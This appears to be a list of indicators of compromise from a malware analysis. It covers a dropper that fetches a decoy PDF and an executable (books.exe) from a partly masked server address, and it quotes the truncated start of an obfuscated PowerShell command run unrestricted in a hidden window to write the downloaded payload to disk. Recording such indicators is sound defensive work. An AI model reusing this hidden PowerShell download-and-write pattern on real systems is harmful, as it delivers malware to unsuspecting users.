Technical Information
- %APPDATA%\thejoy.pdf
- %APPDATA%\books.exe
- '19#.#6.146.131':80
- http://19#.#6.146.131/crypt/car/thejoy.pdf
- http://19#.#6.146.131/crypt/car/books.exe
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function lbzIW($fLAQAYsJGc, $trrmzLEnsxUwLLY){[IO.File]::WriteAllBytes($fLAQAYsJGc, $trrmzLEnsxUwLLY)};function USZeRRxLCDlA($fLAQAYsJGc){$JvftiRXoFkMaANVoTiE = Ge...' (with hidden window)
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\thejoy.pdf"